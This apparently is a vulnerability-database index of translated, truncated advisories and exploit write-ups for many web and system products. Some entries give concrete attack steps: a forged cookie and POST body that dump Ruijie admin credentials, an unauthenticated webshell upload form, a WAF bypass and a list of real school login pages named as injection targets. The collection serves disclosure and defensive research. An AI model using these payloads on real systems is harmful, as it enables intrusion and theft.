Ruijie Router NBR Information Disclosure Vulnerability
Use ModifyHeaders to change the Cookie header to: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; use Hackbar to send a POST request to: http://localhost/WEBVMS/LEVEL15/ with the body: command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. This returns the admin account's username and password. #!/usr/bin/env python # coding: utf-8 import re from pocsuite.net import req fr...
Fortinet FortiWeb Authenticated Command Injection Vulnerability (CVE-2021-22123)
Fortinet FortiWeb OS Command Injection Aug 17, 2021 5 min read An OS command injection vulnerability in FortiWeb's management interface version 6.3.11 and prior can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is ...
Seeyon A8 Collaboration System Arbitrary User Password Modification Vulnerability (instant change)
Brief description: Not only can passwords be changed; users can also be disabled, deleted and added, files uploaded and downloaded, and so on. Detailed description: Some of the collaboration system's interfaces are as follows: 1.2 Authentication service Service name: authorityService WSDL: http://host:port/seeyon/services/authorityService?wsdl 1.2.1 Login authentication ... Authentication token entity (UserToken) ... Authentication Authenticates with a username and password. The username cannot be changed and must be , the default password is...
vBulletin /forumrunner/request.php SQL injection vulnerability
Author: janesknow Chong Yu 404 security lab Date: 2016-11-15 Vulnerability overview Vulnerability description vBulletin is a commercial forum application written in PHP. Researchers have found that the vBulletin core plug-in forumrunner contains a SQL injection vulnerability: CVE-2016-619...
Webfroot Shoutbox 2.32 Expanded.PHP Remote Directory Traversal Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7775/info A problem in Shoutbox may result in traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to the expanded.php script, and could allow the viewing of potentially...
eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities
No description provided by source. eSyndiCat: Multiple SQL Injection's http://www.esyndicat.net/ ---------------------------------------------------------- Exploit coded and founded by d3v1l Date: 14.07.2007 [email protected] ----------------------------------------------------------- Greetz tO...
Apache HTTP Server Multiple Modules Hostname and URI Cross-Site Scripting Vulnerability
BUGTRAQ ID: 58165 CVE(CAN) ID: CVE-2012-3499 Apache HTTP Server is an open-source HTTP server. Apache HTTP Server 2.4.4 and earlier contain multiple XSS vulnerabilities: via hostnames and URIs handled by the modules 1 mod_imagemap, 2 mod_info, 3 mod_ldap, 4 mod_proxy_ftp and 5 mod_status, a remote attacker can inject arbitrary JavaScript and HTML. Affected: Apache Group HTTP Server 2.4.x, Apache Group HTTP Server 2.2.x. Vendor patch: Apache...
Multiple Browsers Web Proxy Redirect Handling Man-in-the-Middle Vulnerability
Bugtraq ID: 35412 CVE ID: CVE-2009-2061 CVE-2009-2062 CVE-2009-2063 Multiple browsers are subject to man-in-the-middle attacks when handling web proxy redirects. An attacker can use this vulnerability for phishing or to obtain sensitive information; however, exploiting it requires the attacker to intercept or control network traffic, for example through a man-in-the-middle or DNS poisoning attack. The following browsers are affected: Mozilla Firefox prior to 3.0.10 Apple Safari prior to 3.2.2 Opera prior to 9.25 Opera Software Opera Web Browser 8.51 Opera...
Linux Polkit Privilege Escalation Vulnerability (CVE-2021-3560)
Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug Kevin Backhouse https://github.blog/author/kevinbackhouse/ polkit is a system service installed by default on many Linux distributions. It's used by systemd, so any Linux distribution that uses systemd also uses...
OpenSSH X Connection Session Hijacking Vulnerability
BUGTRAQ ID: 28444 CVE(CAN) ID: CVE-2008-1483 OpenSSH is an open-source implementation of the SSH protocol, originally written for OpenBSD and since ported to many Unix/Linux operating systems. When a user logs in over SSH with X11 forwarding enabled, sshd(8) does not correctly handle the case where it fails to bind the IPv4 port but successfully binds the IPv6 port. In that situation X11 clients still connect to the IPv4 port even though sshd(8) has not bound it, so the connection cannot be forwarded securely. A malicious user can, on the unused IPv4 port (such as tcp...
Oracle April 2009 Critical Patch Update Fixes Multiple Vulnerabilities
BUGTRAQ ID: 34461 CVE(CAN) ID:...
Yonyou Seeyon A8 Collaboration Management Software status.jsp Sensitive Information Disclosure
Seeyon A8-m collaboration management software is a collaborative office suite intended to help large organizations, group enterprises, government units and foreign-related organizations solve the problems described above. Vulnerability analysis: Seeyon A8-m improperly controls access to sensitive files, leading to the disclosure of a large amount of sensitive information. Exploitation: http://x.x.x.x/seeyon/management/status.jsp This address is the performance monitoring backend and is accessible without authorization...
Mambo cropimage Component <= 1.0 Remote File Include Vulnerability
No description provided by source. C Y B E R - W A R R I O R T I M Mambo com_cropimage 1.0 Component Remote Include Vulnerability Author: XORON Class: Remote cont@ct: x0r0nathotmaildotcom Code: in admin.cropcanvas.php , line 7 require_once $cropimagedir."class.cropinterface.php"; Fix: 1-open...
Qiangzhi Technology Educational Administration System SQL Injection Vulnerability
Brief description: Man: Ask the world what love is, it's just... Woman: A big slap across the face, smack! Damn programmer still wants a girlfriend, deserves to die on his code. Detailed description: As WooYun requested, five cases! http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp http://221.232.159.24/dhjw/jwxs/login.asp http://jiaowu.hustwenhua.net/jwxs/login.asp http://xscx.cmcedu.cn/jwxs/login.asp http://jwxt.hycgy.com:5000/jwxs/login.asp Capture the packet when logging in PO...
Jax Guestbook 3.50 Page Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17560/info Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browse...
Elasticsearch ECE 7.13.3 Information Disclosure Vulnerability (CVE-2021-22146)
Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump Date: 2021-07-21 Exploit Author: Joan Martinez @magichk Vendor Homepage: https://www.elastic.co/ Software Link: https://www.elastic.co/ Version: = 7.10.0 to = 7.13.3 Tested on: Elastic ECE Cloud CVE : CVE-2021-22146 Reference:...
Apache 'mod_deflate' Remote Denial of Service Vulnerability
Bugtraq ID: 35623 CVE ID: CVE-2009-1891 Apache is a popular HTTP server. The Apache mod_deflate module mishandles specially crafted requests, and a remote attacker can exploit this to crash the server. When mod_deflate is enabled, downloading a file and aborting the connection before the transfer completes drives CPU usage for compressing the file to 100%. Even for a modest file of a few MB, submitting concurrent requests for the file and immediately aborting the connections causes it to be compressed many times in parallel, consuming large amounts of CPU time and resulting in a denial of service. Apache Software Foundation Apache 2.2.11 Apache Software...
UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit
No description provided by source. #!/usr/bin/php -q -d short_open_tag=on <? // UBB.threads Multiple input validation error // Discovered By : HACKERS PAL // Copy rights : HACKERS PAL // Website : http://www.soqor.net // Email Address : [email protected] // Tested on Version 6 6.5.1.1 and other...
Wanhu OA System jsFileUpload.jsp File Upload Vulnerability
The Wanhu OA system's jsFileUpload.jsp has a file upload vulnerability. Upload URL: /defaultroot/workflow/jsFileUpload.jsp Only JSP files are accepted here; other file types are rejected. File location: /defaultroot/devform/workflow/<original uploaded file name>...
Apache / PHP 5.x - cgi-bin Remote Code Execution Exploit
No description provided by source. / Apache Magica by Kingcope / / gcc apache-magika.c -o apache-magika -lssl / / This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu the vulnerability is present in the default install of the php5-cgi package. When the php5-cgi...
TRS WCM 5.2 Arbitrary File Upload Vulnerability
Affected version: WCM 5.2; other versions untested. TRS WCM's Web Service provides a way to write files to the server, which can be used to write a JSP file directly and obtain a webshell. Visiting http://xxx.com/wcm/services lists TRS WCM's Web...
phpLDAPadmin functions.php Remote PHP Code Injection Vulnerability
BUGTRAQ ID: 50331 phpLDAPadmin is a web-based LDAP client that makes LDAP servers easy to administer. phpLDAPadmin contains a remote PHP code injection vulnerability; an attacker can exploit it to inject and execute PHP code within the affected application and take control of the system. 1) Input appended to the URL in cmd.php is not properly sanitized before being returned to the user, which can be exploited to execute arbitrary HTML and script code in the browser of a user of the affected site. 2) Input passed in the "orderby" parameter of cmd.php is not properly sanitized in lib/functions.php before being used in a "create_function" call, which can be exploited to inject and execute arbitrary PHP code....
AlstraSoft AskMe Pro <= 2.1 Multiple SQL Injection Vulnerabilities
No description provided by source. -+================================================================================+- -+ AlstraSoft AskMe Pro = 2.1 SQL Injection Vulnerabilitys +- -+================================================================================+- Discovered By: t0pP8uZz...
Ubuntu 14.04 LTS, 15.10 overlayfs - Local Root Exploit
No description provided by source. / just another overlayfs exploit, works on kernels before 2015-12-26 Exploit Title: overlayfs local root Date: 2016-01-05 Exploit Author: rebel Version: Ubuntu 14.04 LTS, 15.10 and more Tested on: Ubuntu 14.04 LTS, 15.10 CVE : CVE-2015-8660 blah@ubuntu:$ id...
Mambo Open Source 4.5/4.6 mod_mainmenu.php Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9445/info It has been reported that Mambo Open Source may be prone to a remote file include vulnerability that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a...
jeecms V2.4.2 ArtiSearch.do Remote Command Execution Vulnerability
0x01 Framework overview Jiangxi Jinlei Technology Development Co., Ltd. (hereafter Jinlei Technology), founded in 2003, produces the JEECMS content management system, the best-known and most widely used Java open-source CMS and site-cluster management system in China. Jinlei Technology is a high-tech enterprise focused on Java web application development. Jeecms is a site-cluster management system built on Java; stability, security, efficiency, cross-platform support and unlimited extensibility are its strengths, and it supports mainstream databases such as MySQL, Oracle, SQL Server and DB2. Homepage: http://www.jeecms.com 0x02 Vulnerability details Google search: inurl:jeecms/ArtiSearch.do returns a large number of instances. Proof of vulnerability:...
BrilliantTS FUZE card (MCU firmware 0.1.73, BLE firmware 0.7.4) Vulnerability
Description of FUZE Card FUZE is an IoT device the size, shape, and thickness of a normal credit card. You program credit cards into it via Bluetooth BLE using a smart phone app. When you go to pay, you use the buttons and e-Paper display to select which card to emulate. The magnetic stripe...
cPanel Multiple Security Vulnerabilities
cPanel is a multilingual hosting control panel that manages an entire site through its domain name. cPanel has multiple security vulnerabilities: 1. Some log files are created world-readable, allowing an attacker to read them and obtain sensitive information. 2. Input submitted to FormMail.pl is not validated before the user is redirected, allowing redirection to an arbitrary web site. 3. An error in Locale::Maketext::maketext when error messages are generated in Cpanel::API::Fileman allows an attacker to submit crafted input and execute arbitrary code. 4. Under certain conditions a trackupload log is created in HOME, which can be used to overwrite files through a symlink attack....
Weaver E-office SQL Injection Vulnerabilities in /E-mobile/flowsorce_page.php and 19 Other Locations (20 in total)
0x01 Vulnerability summary Weaver E-office contains SQL injection vulnerabilities in the following 20 locations: 1 /E-mobile/flowdopage.php?diff=delete&RUNID=1 // parameter RUNID 2 /E-mobile/flowdopage.php?diff=delete&flowid=1 // parameter flowid 3 /E-mobile/flowsorce_page.php?flowid=2 4 /E-mobile/flownextpage.php?diff=candeal&detailid=2 5 /E-mobile/flowimagepage.php?FLOWID=2...
MetInfo 6.0.0 Code Execution Vulnerability (direct shell from the admin backend)
...
lighttpd Directory Traversal Vulnerability
CVE ID: CVE-2014-2324 Lighttpd is an open-source web server developed by German software developer Jan Kneschke; its main feature is matching the performance of comparable web servers while using little memory and CPU. A directory traversal vulnerability exists in lighttpd's mod_evhost and mod_simple_vhost virtual host modules. A remote attacker can exploit it with a specially crafted hostname to read arbitrary files. Affected: lighttpd. The vendor has not yet released a patch or upgrade; we recommend that users of this software watch the vendor's home page for the latest version: http://www.lighttpd.net/2014/3/12/1.4.35/...
Etcd REST API Unauthorized Access Vulnerability
From an application security perspective, databases are the most valuable parts of our systems. They store the data that gives value to our apps and companies. This data, which has been entrusted to us by our users, should be kept safe and out of the hands of criminals. Every developer I talk to is...
Nagios Core < 4.2.2 Curl Command Injection/Code Execution (CVE-2016-9565)
Author: p0wd3r, dawu know Chong Yu 404 security lab Date: 2016-12-15 0x00 vulnerability overview 1. Vulnerability description Nagios is an IT infrastructure monitoring program. Security researcher Dawid Golunski recently discovered a code execution vulnerability in Nagios Core: an...
Weaver OA /tools/SWFUpload/upload.jsp Arbitrary File Upload Vulnerability
tools/SWFUpload/upload.jsp was found not to verify whether the current user is logged in; a submitted file is written directly to the root directory. The resulting access path for the file is: http://www.xxoo.com/null<uploaded file name>.jsp. A locally constructed submission form: form method='post' action='http://www.xxoo.com/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" input type="file" id="file" name="test" style="height:20px;BORDER: 8F908B...
PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions
No description provided by source. Milli-Harekat Advisory www.milli-harekat.org PHP-Nuke = All version - Remote File Include Vulnerabilities Risk : High Class: Remote Script : PHP NUKE ALL VERSION Credits : ERNE Thanks : DjReMix,Eskobar,TRIP,ßy KorsaN,OsL3m7,Poizonbox,Dilejyoner and All MHG USER...
Pulse Connect Secure Authenticated RCE Vulnerability (CVE-2021-22937)
...
Joomla Webring Component <= 1.0 - Remote Include Vulnerability
No description provided by source. C Y BE R - W A R R i O R T I M Joomla Webring Component componentdir Remote File Inclusion Vulnerabilities Author: xoron Class : Remote cont@ct: x0r0nathotmaildotcom Code: in admin.webring.docs.php, line 12 require_once $componentdir. mungdocs.class.php; Google...
MS10-070 ASP.NET Padding Oracle File Download
MS10-070 ASP.NET Padding Oracle Information Disclosure Vulnerability 1. Vulnerability description. ASP.NET mishandles errors during validation of encryption padding, resulting in an information disclosure vulnerability. An attacker who successfully exploits it can read data encrypted by the server, such as view state. The vulnerability can also be used for data tampering: if successfully exploited, it allows decrypting and tampering with data encrypted by the server. Although an attacker cannot use this vulnerability to execute malicious code or directly elevate their privileges, it can be used to gather information for further attacks against the affected system. In other words, while it does not directly yield a shell, in theory it allows reading arbitrary files, including database configuration files. 2. Vulnerability identifier: CVE: CVE-2010-3332 3. Affected...
Jackson-databind Remote Code Execution Vulnerability (CVE-2017-17485)
jackson-rce-via-spel An example project that exploits the default typing issue in Jackson-databind https://github.com/FasterXML/jackson-databind via Spring application contexts and expressions Context The Jackson-databind project has a feature called default-typing not enabled by default. When th...
Microsoft SharePoint Server 2007 XSS Vulnerability
No description provided by source. Vulnerability ID: HTB22350 Reference: http://www.htbridge.ch/advisory/xssinmicrosoftsharepointserver2007.html http://www.microsoft.com/technet/security/advisory/983438.mspx Product: Microsoft SharePoint Server 2007 Vendor: Microsoft Corporation Vulnerable Versio...
UCenter 1.6.0 /control/admin/user.php CAPTCHA Bypass Vulnerability
No description provided by source...
Practical Bypass of Yunsuo (1.3.145) for Injection Testing: Bypass Techniques
Brief description: This time, a real example. Detailed description: @疯狗 thanks for the hint; see zone http://zone.wooyun.org/content/16772, the id=8E0union select ... form and id=8.0union select ... Proof of vulnerability: Set up a 74cms web environment locally and enable all Yunsuo protections. The injection point below was tested after removing the corresponding intval. include/funwap.php function companyone$id global $db; $wheresql=" WHERE id=".$id;//here $sql = "select from...
FileSeek CGI Script File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6784/info FileSeek is an example cgi-script from The CGI/Perl Cookbook from John Wiley & Sons. The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web server...
Pivot 1.0 - Remote module_db.PHP File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10553/info It has been reported that Pivot is affected by a remote file include vulnerability contained within the moduledb.php script. This issue is due to a failure of the application to properly sanitize user-supplied...
SugarCRM v6. 5. 23 PHP deserialize an object injection vulnerability
Author: p0wd3r know Chong Yu 404 security lab Date: 2016-09-12 0x00 vulnerability overview 1. Vulnerability description SugarCRM(http://www.sugarcrm.com/ is a set of open source Customer Relationship Management System. Recent researchers found in its=6.5.23 version exists in the deserialization...
Dotproject 2.0 /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to includ...
webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability
No description provided by source. [ASCII art banner] ¡VIVA SPAIN!... WE WILL WIN THE WORLD CUP!... o.O PROUD TO BE SPANISH!...
Gitblit Source Repository Authentication Bypass Vulnerability
Gitblit is a pure Java library for managing, viewing and serving Git repositories. Gitblit has an authentication bypass vulnerability; a remote attacker can exploit it with forged login credentials to clone source repositories. Affected: Gitblit 0.6.9. Vendor solution: Gitblit 0.7 fixes this vulnerability, and users are advised to download it: http://gitblit.com/...
Ehcache RMI Remote Code Execution Vulnerability (CVE-2020-36239)
...
Ubuntu Local Privilege Escalation Vulnerability (CVE-2017-16995)
Since commit f1174f77b50c "bpf/verifier: rework value tracking", the eBPF range tracking is security-relevant for the verification of eBPF code provided by unprivileged users. Therefore, any tiny slip-up in the arithmetic range tracking now turns into an arbitrary read+write in the full kernel...